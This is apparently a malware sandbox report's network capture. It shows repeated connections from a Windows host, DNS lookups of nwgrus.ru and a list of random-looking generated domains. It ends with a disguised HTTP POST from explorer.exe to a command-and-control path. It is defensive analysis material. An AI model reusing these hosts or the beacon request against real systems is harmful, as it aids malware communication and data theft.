                                                                                                                                                              Sep 30, 2024 15:39:35.761183023 CEST4975280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:35.766216040 CEST8049752187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:35.766324997 CEST4975280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:35.766473055 CEST4975280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:35.766506910 CEST4975280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:35.771320105 CEST8049752187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:35.773209095 CEST8049752187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:36.911855936 CEST8049752187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:36.916297913 CEST8049752187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:36.916353941 CEST4975280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:36.916414976 CEST4975280192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:36.921190977 CEST8049752187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:39.434309959 CEST4975380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:39.439409018 CEST8049753187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:39.439696074 CEST4975380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:39.439867973 CEST4975380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:39.440026045 CEST4975380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:39.444622993 CEST8049753187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:39.444920063 CEST8049753187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:40.478954077 CEST8049753187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:40.479079962 CEST8049753187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:40.479139090 CEST4975380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:40.479188919 CEST4975380192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:40.484101057 CEST8049753187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:46.691587925 CEST4975480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:46.696660042 CEST8049754187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:46.696757078 CEST4975480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:46.696904898 CEST4975480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:46.696937084 CEST4975480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:46.701838017 CEST8049754187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:46.701951981 CEST8049754187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:47.649435043 CEST8049754187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:47.649873018 CEST8049754187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:47.650001049 CEST4975480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:47.663799047 CEST4975480192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:47.668896914 CEST8049754187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:56.147528887 CEST4975580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:56.152559042 CEST8049755187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:56.152637959 CEST4975580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:56.152930975 CEST4975580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:56.152930975 CEST4975580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:56.157846928 CEST8049755187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:56.157860994 CEST8049755187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:57.130166054 CEST8049755187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:57.130187988 CEST8049755187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:39:57.130254984 CEST4975580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:57.130433083 CEST4975580192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:39:57.137403965 CEST8049755187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:08.762703896 CEST4975680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:40:08.767687082 CEST8049756187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:08.767813921 CEST4975680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:40:08.768022060 CEST4975680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:40:08.768075943 CEST4975680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:40:08.772794962 CEST8049756187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:08.772926092 CEST8049756187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:09.910373926 CEST8049756187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:09.910399914 CEST8049756187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:09.910485983 CEST4975680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:40:09.910594940 CEST4975680192.168.2.8187.228.112.175
                                                                                                                                                              Sep 30, 2024 15:40:09.915339947 CEST8049756187.228.112.175192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:16.819159031 CEST49757443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:16.819215059 CEST4434975723.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:16.819271088 CEST49757443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:16.819753885 CEST49757443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:16.819766998 CEST4434975723.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:17.407783985 CEST4434975723.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:17.407907963 CEST49757443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:17.484548092 CEST49757443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:17.484569073 CEST4434975723.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:17.484962940 CEST4434975723.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:17.577455997 CEST49757443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:17.577692032 CEST49757443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:17.577728987 CEST4434975723.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:17.914979935 CEST4434975723.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:17.915092945 CEST4434975723.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:17.916212082 CEST49757443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:17.916306019 CEST49757443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:17.916327000 CEST4434975723.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:17.916342020 CEST49757443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:17.916347980 CEST4434975723.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:23.501794100 CEST4975880192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:23.506649971 CEST8049758109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:23.506861925 CEST4975880192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:23.506861925 CEST4975880192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:23.508078098 CEST4975880192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:23.511784077 CEST8049758109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:23.513035059 CEST8049758109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:24.269634962 CEST8049758109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:24.269792080 CEST8049758109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:24.269864082 CEST4975880192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:24.270076990 CEST4975880192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:24.274859905 CEST8049758109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:37.044555902 CEST49759443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:37.044630051 CEST4434975923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:37.044704914 CEST49759443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:37.045286894 CEST49759443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:37.045305014 CEST4434975923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:37.642054081 CEST4434975923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:37.642164946 CEST49759443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:37.643441916 CEST49759443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:37.643455029 CEST4434975923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:37.643697977 CEST4434975923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:37.644630909 CEST49759443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:37.644670963 CEST49759443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:37.644692898 CEST4434975923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:38.006520033 CEST4434975923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:38.006927013 CEST4434975923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:38.006987095 CEST49759443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:38.007025003 CEST49759443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:38.007047892 CEST4434975923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:38.007066011 CEST49759443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:38.007071972 CEST4434975923.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:45.412314892 CEST4976080192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:45.417406082 CEST8049760109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:45.417500973 CEST4976080192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:45.417623043 CEST4976080192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:45.417640924 CEST4976080192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:45.422547102 CEST8049760109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:45.422617912 CEST8049760109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:46.200867891 CEST8049760109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:46.200927973 CEST8049760109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:46.200997114 CEST4976080192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:46.201169968 CEST4976080192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:40:46.205950975 CEST8049760109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:58.707047939 CEST49761443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:58.707104921 CEST4434976123.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:58.707173109 CEST49761443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:58.707680941 CEST49761443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:58.707695961 CEST4434976123.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:59.307431936 CEST4434976123.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:59.307504892 CEST49761443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:59.316551924 CEST49761443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:59.316576958 CEST4434976123.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:59.316875935 CEST4434976123.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:59.326967955 CEST49761443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:59.327004910 CEST49761443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:59.327172995 CEST4434976123.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:59.669682980 CEST4434976123.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:59.669764042 CEST4434976123.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:59.669814110 CEST49761443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:59.669956923 CEST49761443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:59.669979095 CEST4434976123.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:59.669994116 CEST49761443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:40:59.669998884 CEST4434976123.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:08.379215956 CEST4976280192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:41:08.384114981 CEST8049762109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:08.384185076 CEST4976280192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:41:08.384318113 CEST4976280192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:41:08.384341002 CEST4976280192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:41:08.389102936 CEST8049762109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:08.389115095 CEST8049762109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:09.207103014 CEST8049762109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:09.207516909 CEST8049762109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:09.207581997 CEST4976280192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:41:09.207623005 CEST4976280192.168.2.8109.121.204.14
                                                                                                                                                              Sep 30, 2024 15:41:09.212410927 CEST8049762109.121.204.14192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:22.021891117 CEST49763443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:41:22.021938086 CEST4434976323.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:22.022027969 CEST49763443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:41:22.022394896 CEST49763443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:41:22.022413969 CEST4434976323.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:22.620795012 CEST4434976323.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:22.620956898 CEST49763443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:41:22.622133017 CEST49763443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:41:22.622147083 CEST4434976323.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:22.622383118 CEST4434976323.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:22.625318050 CEST49763443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:41:22.625318050 CEST49763443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:41:22.625391960 CEST4434976323.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:22.977950096 CEST4434976323.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:22.978044987 CEST4434976323.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:22.978112936 CEST49763443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:41:22.978297949 CEST49763443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:41:22.978319883 CEST4434976323.145.40.162192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:41:22.978337049 CEST49763443192.168.2.823.145.40.162
                                                                                                                                                              Sep 30, 2024 15:41:22.978343010 CEST4434976323.145.40.162192.168.2.8
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Sep 30, 2024 15:37:49.031186104 CEST5141653192.168.2.81.1.1.1
                                                                                                                                                              Sep 30, 2024 15:37:50.027431965 CEST5141653192.168.2.81.1.1.1
                                                                                                                                                              Sep 30, 2024 15:37:51.027476072 CEST5141653192.168.2.81.1.1.1
                                                                                                                                                              Sep 30, 2024 15:37:51.350625038 CEST53514161.1.1.1192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:51.350683928 CEST53514161.1.1.1192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:37:51.350713968 CEST53514161.1.1.1192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:38:43.734596968 CEST5775953192.168.2.81.1.1.1
                                                                                                                                                              Sep 30, 2024 15:38:43.858412027 CEST53577591.1.1.1192.168.2.8
                                                                                                                                                              Sep 30, 2024 15:40:23.364310980 CEST6234653192.168.2.81.1.1.1
                                                                                                                                                              Sep 30, 2024 15:40:23.498295069 CEST53623461.1.1.1192.168.2.8
                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Sep 30, 2024 15:37:49.031186104 CEST192.168.2.81.1.1.10xebcbStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:50.027431965 CEST192.168.2.81.1.1.10xebcbStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.027476072 CEST192.168.2.81.1.1.10xebcbStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:38:43.734596968 CEST192.168.2.81.1.1.10x748dStandard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:40:23.364310980 CEST192.168.2.81.1.1.10x9450Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Sep 30, 2024 15:37:51.350625038 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru187.228.112.175A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350625038 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350625038 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru148.255.44.91A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350625038 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350625038 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350625038 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru109.121.204.14A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350625038 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350625038 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350625038 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.249.193.233A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350625038 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru189.163.45.204A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350683928 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru187.228.112.175A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350683928 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350683928 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru148.255.44.91A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350683928 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350683928 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350683928 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru109.121.204.14A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350683928 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350683928 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350683928 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.249.193.233A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350683928 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru189.163.45.204A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350713968 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru187.228.112.175A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350713968 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350713968 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru148.255.44.91A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350713968 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350713968 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350713968 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru109.121.204.14A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350713968 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350713968 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350713968 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru190.249.193.233A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:37:51.350713968 CEST1.1.1.1192.168.2.80xebcbNo error (0)nwgrus.ru189.163.45.204A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:38:43.858412027 CEST1.1.1.1192.168.2.80x748dNo error (0)calvinandhalls.com23.145.40.162A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:40:23.498295069 CEST1.1.1.1192.168.2.80x9450No error (0)nwgrus.ru109.121.204.14A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:40:23.498295069 CEST1.1.1.1192.168.2.80x9450No error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:40:23.498295069 CEST1.1.1.1192.168.2.80x9450No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:40:23.498295069 CEST1.1.1.1192.168.2.80x9450No error (0)nwgrus.ru190.249.193.233A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:40:23.498295069 CEST1.1.1.1192.168.2.80x9450No error (0)nwgrus.ru189.163.45.204A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:40:23.498295069 CEST1.1.1.1192.168.2.80x9450No error (0)nwgrus.ru187.228.112.175A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:40:23.498295069 CEST1.1.1.1192.168.2.80x9450No error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:40:23.498295069 CEST1.1.1.1192.168.2.80x9450No error (0)nwgrus.ru148.255.44.91A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:40:23.498295069 CEST1.1.1.1192.168.2.80x9450No error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 30, 2024 15:40:23.498295069 CEST1.1.1.1192.168.2.80x9450No error (0)nwgrus.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                                                                                                              • 23.145.40.164
                                                                                                                                                              • https:
                                                                                                                                                                • calvinandhalls.com
                                                                                                                                                              • dhwuphumqtqn.com
                                                                                                                                                                • nwgrus.ru
                                                                                                                                                              • tkpgpviexggpuwvs.net
                                                                                                                                                              • jrbmtindhjismyee.com
                                                                                                                                                              • ynepfbdxkuieepaf.net
                                                                                                                                                              • xkxmfugtrnxonclj.com
                                                                                                                                                              • ymeegmcrvikfsv.org
                                                                                                                                                              • qnssdnlxskerq.com
                                                                                                                                                              • vpprwqijyswgyjvy.com
                                                                                                                                                              • ayjhmseqvvjye.com
                                                                                                                                                              • bnqsjigsukajkt.org
                                                                                                                                                              • ejrqbeuhiivimsok.org
                                                                                                                                                              • yanbtiwxewyyhy.com
                                                                                                                                                              • frpabbqmujgvx.net
                                                                                                                                                              • ybeufjfqrbhah.org
                                                                                                                                                              • astksdjaitsnxo.com
                                                                                                                                                              • ssdmhljrxull.net
                                                                                                                                                              • mshenhcpddejse.org
                                                                                                                                                              • pjefvbuybfqlgx.org
                                                                                                                                                              • fufaecmkeyed.org
                                                                                                                                                              • naauncqsbvtxnxe.net
                                                                                                                                                              • lcpcrwvedbvpllck.net
                                                                                                                                                              • lgertcnwaskqpc.com
                                                                                                                                                              • fevqsrdkflt.net
                                                                                                                                                              • drnpfojnpvggv.org
                                                                                                                                                              • ibetbbesaakqkq.net
                                                                                                                                                              • tyqfkmhoepxpii.net
                                                                                                                                                              • wyjfuitjcdhsl.com
                                                                                                                                                              • ecpjrwjcauix.com
                                                                                                                                                              • bxntarqqdjdvdpxp.net
                                                                                                                                                              • blfmqjnqqyje.org
                                                                                                                                                              • gieuyuggiqfgtm.com
                                                                                                                                                              • eankyeljcevd.net
                                                                                                                                                              • luejdvwxxrcvrqdh.com
                                                                                                                                                              • svfopofgftavf.com
                                                                                                                                                              • bprjpwpsmmrgaa.org
                                                                                                                                                              • ocnxfkuqumobjmad.net
                                                                                                                                                              • dxdhacbibrdlwrt.com
                                                                                                                                                              • nlmsxhroxptelhd.org
                                                                                                                                                              • hikneccvvrshgb.com
                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.849706187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:37:51.359580994 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://dhwuphumqtqn.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 258
                                                                                                                                                              Host: nwgrus.ru
